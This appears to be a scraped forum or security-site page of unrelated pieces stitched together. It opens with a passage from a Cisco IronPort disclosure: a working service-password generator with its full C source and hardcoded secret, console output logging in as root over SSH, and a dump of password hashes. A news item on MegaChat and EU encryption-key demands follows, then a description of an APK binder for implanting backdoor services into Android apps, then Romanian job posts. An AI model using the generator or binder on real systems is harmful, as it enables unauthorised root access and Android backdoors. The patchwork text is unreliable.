ironport.example.com> Generate Service Account Password --------------------------------- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe Usage: woofwoof.exe -p password -s serial -p <password> | Cisco Service Temp Password -s <serial> | Cisco Serial Number -h | This Help Menu Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4 Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019 F508A4 Service Password: b213c9a4 Login to the appliance as Service account with root privileges -------------------------------------------------------------- root@kali:~# ssh -lservice 192.168.0.158 Password: Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance # uname -a FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64 # cat /etc/master.passwd # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $ root:*:0:0::0:0:Mr &:/root:/sbin/nologin service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin operator:*:2:5::0:0:System &:/:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include "md5.h" #include "getopt.h" #define MAX_BUFFER 128 #define SECRET_PASS "woofwoof" void usage(char *name); void to_lower(char *str); void fuzz_string(char *str); int main(int argc, char *argv[]) { if (argc < 2) { usage(argv[0]); } int opt; int index; char *temp_pass = { 0 }; char *serial_no = { 0 }; char *secret_pass = SECRET_PASS; char service[MAX_BUFFER] = { 0 }; unsigned char digest[16] = { 0 }; while ((opt = getopt(argc, argv, "p:s:h")) != -1) { switch (opt) { case 'p': temp_pass = optarg; break; case 's': serial_no = optarg; break; case 'h': usage(argv[0]); break; default: printf_s("Wrong Argument: %s\n", argv[1]); break; } } for (index = optind; index < argc; index++) { usage(argv[0]); exit(0); } if (temp_pass == NULL || serial_no == NULL) { usage(argv[0]); exit(0); } if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) { to_lower(serial_no); fuzz_string(temp_pass); strcpy_s(service, sizeof(service), temp_pass); strcat_s(service, sizeof(service), serial_no); strcat_s(service, sizeof(service), secret_pass); MD5_CTX context; MD5_Init(&context); MD5_Update(&context, service, strlen(service)); MD5_Final(digest, &context); printf_s("Service Password: "); for (int i = 0; i < sizeof(digest)-12; i++) printf("%02x", digest[i]); } return 0; } void fuzz_string(char *str) { while (*str){ switch (*str) { case '1': *str = 'i'; break; case '0': *str = 'o'; break; case '_': *str = '-'; break; } str++; } } void to_lower(char *str) { while (*str) { if (*str >= 'A' && *str <= 'Z') { *str += 0x20; } str++; } } void usage(char *name) { printf_s("\nUsage: %s -p password -s serial\n", name); printf_s(" -p <password> | Cisco Service Temp Password\n"); printf_s(" -s <serial> | Cisco Serial Number\n"); printf_s(" -h | This Help Menu\n"); printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name); exit(0); } Source

Internet entrepreneur Kim Dotcom has released an encrypted chat service, called MegaChat, to compete with the Microsoft-owned Skype. The release would be rolled out gradually, beginning with video-calling on Thursday, he said. The news came as it emerged a top EU official wants companies to be required by law to hand over encryption keys. The EU counter-terrorism coordinator's proposal follows a similar call by Prime Minister David Cameron. In a document leaked by the civil liberties group Statewatch, Gilles de Kerchove said encryption "increasingly makes lawful interception by the relevant national authorities technically difficult or even impossible". He wrote: "The [European] Commission should be invited to explore rules obliging internet and telecommunications companies operating in the EU to provide, under certain conditions as set out in the relevant national laws and in full compliance with fundamental rights, access of the relevant national authorities to communications (ie share encryption keys)." Mr De Kerchove refused to comment on the leaked document. Earlier this month, Mr Cameron said he wanted internet firms to allow the government to view encrypted messages in order to aid the security services. But his plans to revive the Communications Data Bill, dubbed the "snoopers' charter", were criticised by civil liberties groups and the Deputy Prime Minister, Nick Clegg. Announcing the launch of the beta version of his MegaChat service, Mr Dotcom said that video-calling would gradually be followed by a text-chat service and video-conferencing. About three years ago, Mr Dotcom's Megaupload site was seized and he was arrested in an armed raid on his New Zealand house. Announcing the launch of MegaChat on Twitter, he noted the timeline that lead from the raid to Thursday's announcement, highlighting the launch of his new site, Mega, and a political party in the subsequent years. And he wrote: "#Mega offers a security bounty again. Please report any security flaw to us. We'll fix it and reward you. Thanks for helping." Mr Dotcom still faces extradition from New Zealand to the United States on copyright infringement charges. In November last year, he said he was "broke" as a result of the consequent legal fight. He put the cost at $10m (£6.4m) since his arrest in 2012. Source

apk_binder_script allows us to unify two apk’s in one or add a service apk smali code to the target. This copy smali code, active and manifest. Implements a receiver acting loader loading the class specified as a parameter (a service). The original application is normally run in parallel, the service is invoked by the loader based on two events: android.intent.action.BOOT_COMPLETED android.intent.action.ACTION_POWER_CONNECTED You can add actions and permissions as desired. In short, allows us to “extend” the functionality of a apk, doors implement “administrative” etc. Download: https://github.com/funsecurity/apk_binder_script

deleted

Daca va pricepeti la reparat aparate foto, video, sisteme audio, video etc. Tot ce tine de gama asta sau se poate incadra in astfel de categorie, va pot pune la dispozitie un interviu si o proba practica, sa dovediti ceea ce sustineti ca stiti. Jobul este in cadrul unui service din Bucuresti, autorizat Samsung. Program de 8 ore + 1 ora pauza. Trebuie sa cunoasteti electronica, sa fiti calmi chiar si in cazurile cand aveti un client fata in fata si sa aveti habar de ce trebuie reparat. Mai multe detalii va dau prin PM.

Salut, Am nevoie de un template flash sau non-flash pentru service IT, dar care sa arate fff bine, business, elegant, etc. Pe template monster nu am gasit, poate ma ajutati voi. Merci